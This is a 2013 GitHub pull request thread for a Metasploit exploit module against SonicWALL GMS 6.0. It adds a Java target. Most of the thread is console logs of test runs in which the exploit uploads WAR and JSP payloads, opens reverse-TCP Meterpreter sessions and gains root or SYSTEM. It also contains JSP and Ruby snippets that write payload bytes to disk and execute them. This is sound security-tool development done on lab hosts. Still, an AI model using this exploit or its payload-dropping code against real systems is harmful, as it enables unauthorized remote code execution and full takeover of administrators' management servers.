
Java target for Sonicwall GMS upload module #1459

Merged
merged 11 commits into from Feb 8, 2013

Conversation

@jlee-r7 jlee-r7 commented Feb 8, 2013

See #1384 and #1369

Still some debugging junk, needs some more love.
This just puts a bandaid around the issue and makes it so FileDropper
doesn't completely break java and posix meterpreter sessions.

[SeeRM rapid7#7721]
Conflicts:
	modules/exploits/multi/http/sonicwall_gms_upload.rb

Adds a loop around triggering the WAR payload, which was causing some
unreliability with the Java target.
@jvazquez-r7

Looking into it!

@jvazquez-r7

Eyeballed and looks good, testing on Linux:

msf > use exploit/multi/http/sonicwall_gms_upload 
msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.172
rhost => 192.168.1.172
msf  exploit(sonicwall_gms_upload) > check

[*] Target looks like Linux
[+] The target is vulnerable.
msf  exploit(sonicwall_gms_upload) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   SonicWALL GMS 6.0 Viewpoint / Java Universal
   1   SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2
   2   SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)


msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading WAR file
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30216 bytes) to 192.168.1.172
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.172:39062) at 2013-02-08 08:47:51 +0100
[+] Deleted /opt/GMSVP/Tomcat/webapps/zSVafnXHnH0E7KVH0se.war
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/xCzYxwOr.jsp

meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.172 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > set target 2
target => 2
msf  exploit(sonicwall_gms_upload) > exploit

[-] Exploit failed: java/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
msf  exploit(sonicwall_gms_upload) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading executable file
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.172
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.172:39063) at 2013-02-08 08:48:22 +0100
[+] Deleted /opt/GMSVP/Tomcat/MAnxPyWv
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/svXrLzor.jsp

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.172 - Meterpreter session 2 closed.  Reason: User exit

@jvazquez-r7

First tests on Windows failed, looking into this

msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.140
rhost => 192.168.1.140
msf  exploit(sonicwall_gms_upload) > check

[*] Target looks like Windows
[+] The target is vulnerable.
msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > exploit

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading WAR file
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
^C[-] Exploit failed: Interrupt 
[!] This exploit may require manual cleanup of: C:\GMSVP\Tomcat\/webapps/Qg3w62TK3afsS3MkcFioML0Der.war
[!] This exploit may require manual cleanup of: C:\GMSVP\Tomcat\/webapps/appliance/jcVczJHS.jsp
[*] Exploit completed, but no session was created.
msf  exploit(sonicwall_gms_upload) > set target 1
target => 1
msf  exploit(sonicwall_gms_upload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading executable file
[!] This exploit may require manual cleanup of: C:\GMSVP\Tomcat\aNLcAMSx
[!] This exploit may require manual cleanup of: C:\GMSVP\Tomcat\webapps\appliance\hwHmaVDo.jsp
[*] Exploit completed, but no session was created.

@jvazquez-r7

Problem on Windows when launching the native payload:

org.apache.jasper.JasperException: Unable to compile class for JSP: 

An error occurred at line: 4 in the jsp file: /dFowQYSC.jsp
Invalid escape sequence (valid ones are  \b  \t  \n  \f  \r  \"  \'  \\ )
1: <%@ page import="java.io.*" %>
2: <%
3: String data = "504b030414000000000026......0";
4: FileOutputStream outputstream = new FileOutputStream("C:\GMSVP\Tomcat\/webapps/ZYxvMp84ZI.war");
5: int numbytes = data.length();
6: byte[] bytes = new byte[numbytes/2];
7: for (int counter = 0; counter < numbytes; counter += 2)


Stacktrace:
    org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:92)
    org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:330)
    org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:439)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:334)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:312)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:299)
    org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:586)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:317)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:342)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:267)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)

It can be solved by escaping "\" chars; I added it to jsp_drop_bin for testing. After that, another exception because chmod isn't available; after avoiding the chmod line:

org.apache.jasper.JasperException: An exception occurred processing JSP page /JfWmiojx.jsp at line 21

18: %>
19: <%@ page import="java.io.*" %>
20: <%
21: Runtime.getRuntime().exec("chmod +x C:\\GMSVP\\Tomcat\\uZFdHvgK");
22: Runtime.getRuntime().exec("C:\\GMSVP\\Tomcat\\uZFdHvgK");
23: %>


Stacktrace:
    org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:505)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:404)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:342)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:267)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
root cause

java.io.IOException: Cannot run program "chmod": CreateProcess error=2, The system cannot find the file specified
    java.lang.ProcessBuilder.start(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    org.apache.jsp.JfWmiojx_jsp._jspService(JfWmiojx_jsp.java:77)
    org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:374)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:342)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:267)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
root cause

java.io.IOException: CreateProcess error=2, The system cannot find the file specified
    java.lang.ProcessImpl.create(Native Method)
    java.lang.ProcessImpl.<init>(Unknown Source)
    java.lang.ProcessImpl.start(Unknown Source)
    java.lang.ProcessBuilder.start(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    java.lang.Runtime.exec(Unknown Source)
    org.apache.jsp.JfWmiojx_jsp._jspService(JfWmiojx_jsp.java:77)
    org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:374)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:342)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:267)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:717)

After avoiding chmod in case of a Windows target:

msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading executable file
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.140:1202) at 2013-02-08 09:19:05 +0100
[+] Deleted C:\GMSVP\Tomcat\webapps\appliance\RfPBiDhi.jsp
[!] This exploit may require manual cleanup of: C:\\GMSVP\\Tomcat\\fYquDjme

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 3 closed.  Reason: User exit
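
The escaping point above, as an added example in Ruby (the module's language): this is not code from the Metasploit module or from this PR. The JSP failed to compile because the raw Windows path `C:\GMSVP\Tomcat\` was pasted between double quotes in Java source, where `\G` and `\T` are not legal escape sequences. The helper below escapes a value for a Java string literal and, as a check, scans a literal body for sequences javac would reject (the set named in the compile error, plus octal escapes; `\uXXXX` is translated before lexing and is not modelled). The sample path is constructed from the install path and WAR name the log reports.

```ruby
# Added example: not code from the Metasploit module or this PR.
# Embeds a filesystem path into a Java string literal (as a JSP would
# contain) and checks a literal body for escape sequences javac rejects.

# Characters javac accepts directly after a backslash: the set listed in
# the "Invalid escape sequence" error above. Octal escapes (\0..\7) are
# also legal in Java and are handled separately below.
JAVA_SIMPLE_ESCAPES = ["b", "t", "n", "f", "r", "\"", "'", "\\"].freeze

# Escape a raw string so it can sit between double quotes in Java source.
# Every backslash becomes "\\" and every double quote becomes "\"", so a
# Windows path such as C:\GMSVP\Tomcat\ comes out as C:\\GMSVP\\Tomcat\\.
def java_escape(raw)
  raw.gsub(/["\\]/) { |c| "\\" + c }
end

# Wrap the escaped value in quotes, ready to paste into Java/JSP source.
def java_string_literal(raw)
  "\"#{java_escape(raw)}\""
end

# Return the escape sequences inside a literal body (the text between the
# quotes) that javac would reject. An empty array means the literal compiles.
def invalid_java_escapes(body)
  bad = []
  i = 0
  while i < body.length
    if body[i] == "\\"
      nxt = body[i + 1]
      ok = !nxt.nil? && (JAVA_SIMPLE_ESCAPES.include?(nxt) || nxt.match?(/[0-7]/))
      bad << "\\#{nxt}" unless ok
      i += 2
    else
      i += 1
    end
  end
  bad
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: the install path the log above reports on Windows,
  # joined to the same mixed-separator WAR path the failing JSP contained.
  raw_path = 'C:\GMSVP\Tomcat\\' + '/webapps/ZYxvMp84ZI.war'
  puts "raw literal:     \"#{raw_path}\""
  puts "  rejected:      #{invalid_java_escapes(raw_path).inspect}"
  puts "escaped literal: #{java_string_literal(raw_path)}"
  puts "  rejected:      #{invalid_java_escapes(java_escape(raw_path)).inspect}"
end
```

Escape only at the point where the value is embedded in Java source and keep the unescaped path for everything else. The later log lines "manual cleanup of: C:\\GMSVP\\Tomcat\\fYquDjme" suggest the escaped form was also registered for cleanup, which is not a path that exists on disk, so the dropped file stays behind after the session ends.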

@jvazquez-r7

The Java target issues on Windows were the same as above:

msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading WAR file
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30216 bytes) to 192.168.1.140
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.140:1204) at 2013-02-08 09:24:05 +0100
[+] Deleted C:\\GMSVP\\Tomcat\\/webapps/yfIOV.war
[+] Deleted C:\GMSVP\Tomcat\/webapps/appliance/UDsyaHWD.jsp

meterpreter > 

I'm going to comment on the code and wait for @jlee-r7's feedback, thanks @jlee-r7!

      def jsp_execute_command(command)
        jspraw = %Q|<%@ page import="java.io.*" %>\n|
        jspraw << %Q|<%\n|
        jspraw << %Q|Runtime.getRuntime().exec("chmod +x #{command}");\n|

Contributor

To avoid issues on Windows systems I'm doing this:

        jspraw << %Q|try {\n|
        jspraw << %Q|Runtime.getRuntime().exec("chmod +x #{command}");\n|
        jspraw << %Q|} catch (IOException ioe) {\n|
        jspraw << %Q|}\n|


Contributor Author

Makes sense, thanks!

* Catch IOError when chmod doesn't exist (i.e. Windows)
* Proper escaping for paths
Fixes the java target on windows victims
@jvazquez-r7

Awesome! Working fine now! Merging!

msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.140 
rhost => 192.168.1.140
msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
msf  exploit(sonicwall_gms_upload) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading WAR file
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.140:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30216 bytes) to 192.168.1.140
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.140:1216) at 2013-02-08 19:14:29 +0100
[+] Deleted C:\\GMSVP\\Tomcat\\webapps\\TLg2hvQeRJMuk.war
[+] Deleted C:\\GMSVP\\Tomcat\\webapps\\appliance\\qBuyhABq.jsp

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 1 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > set target 1
target => 1
msf  exploit(sonicwall_gms_upload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.140:80 - Retrieving Tomcat installation path...
[+] 192.168.1.140:80 - Tomcat installed on C:\GMSVP\Tomcat\
[*] 192.168.1.140:80 - Uploading executable file
[*] Sending stage (752128 bytes) to 192.168.1.140
[*] Meterpreter session 2 opened (192.168.1.128:4444 -> 192.168.1.140:1217) at 2013-02-08 19:15:59 +0100
[+] Deleted C:\\GMSVP\\Tomcat\\webapps\\appliance\\CyQrBRtn.jsp
[!] This exploit may require manual cleanup of: C:\\GMSVP\\Tomcat\\wcTGrbVN

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.140 - Meterpreter session 2 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > set target 0
target => 0
msf  exploit(sonicwall_gms_upload) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > set rhost 192.168.1.172
rhost => 192.168.1.172
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading WAR file
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] 192.168.1.172:80 - Attempting to launch payload in deployed WAR...
[*] Sending stage (30216 bytes) to 192.168.1.172
[*] Meterpreter session 3 opened (192.168.1.128:4444 -> 192.168.1.172:39065) at 2013-02-08 19:16:58 +0100
[+] Deleted /opt/GMSVP/Tomcat/webapps/in857c.war
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/FBNNlAty.jsp

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.172 - Meterpreter session 3 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > check

[*] Target looks like Linux
[+] The target is vulnerable.
msf  exploit(sonicwall_gms_upload) > set target 2
target => 2
msf  exploit(sonicwall_gms_upload) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf  exploit(sonicwall_gms_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] 192.168.1.172:80 - Retrieving Tomcat installation path...
[+] 192.168.1.172:80 - Tomcat installed on /opt/GMSVP/Tomcat/
[*] 192.168.1.172:80 - Uploading executable file
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.1.172
[*] Meterpreter session 4 opened (192.168.1.128:4444 -> 192.168.1.172:39066) at 2013-02-08 19:17:20 +0100
[+] Deleted /opt/GMSVP/Tomcat/VgxbzWUi
[+] Deleted /opt/GMSVP/Tomcat/webapps/appliance/jrYRscsy.jsp

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.172 - Meterpreter session 4 closed.  Reason: User exit
msf  exploit(sonicwall_gms_upload) > 

@jvazquez-r7 jvazquez-r7 merged commit 9b6f2fc into rapid7:master Feb 8, 2013